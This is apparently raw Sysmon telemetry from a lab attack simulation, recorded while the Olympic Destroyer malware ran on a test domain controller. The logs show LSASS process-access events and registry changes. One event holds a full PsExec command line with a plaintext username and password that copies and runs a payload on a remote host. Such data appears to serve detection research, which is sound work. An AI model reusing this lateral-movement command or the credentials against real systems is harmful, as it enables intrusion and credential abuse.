10:56:46.281{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EE-6216-7905-000000003802}6880C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291136Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.281{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EE-6216-7905-000000003802}6880C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291135Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:46.266{C8EA50B7-12EE-6216-7905-000000003802}6880C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291134Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.244{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EE-6216-7A05-000000003802}6940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291133Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.244{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EE-6216-7A05-000000003802}6940C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291132Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.229{C8EA50B7-12EE-6216-7A05-000000003802}69407080C:\Windows\system32\conhost.exe{C8EA50B7-12EE-6216-7905-000000003802}6880C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291131Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.213{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12EE-6216-7A05-000000003802}6940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291130Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.197{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EE-6216-7A05-000000003802}6940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291129Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.081{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EE-6216-7905-000000003802}6880C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291128Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.081{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291127Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.081{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291126Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.081{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291125Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.081{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291124Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.081{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12EE-6216-7905-000000003802}6880C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291123Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.086{C8EA50B7-12EE-6216-7905-000000003802}6880C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-255.eu-central-1.compute.internal -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291122Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.081{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EE-6216-7905-000000003802}6880C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291121Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.066{C8EA50B7-12ED-6216-7705-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291120Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.066{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12ED-6216-7705-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291119Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.066{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12ED-6216-7705-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291118Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:46.044{C8EA50B7-12ED-6216-7705-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291117Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.012{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12ED-6216-7805-000000003802}6816C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291116Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.012{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12ED-6216-7805-000000003802}6816C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291115Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.012{C8EA50B7-12ED-6216-7805-000000003802}68165772C:\Windows\system32\conhost.exe{C8EA50B7-12ED-6216-7705-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217697Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.901{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-12EF-6216-8404-000000003902}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217696Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.901{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217695Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.901{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217694Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.901{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217693Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.901{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217692Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.901{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217691Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.901{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217690Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.901{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217689Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 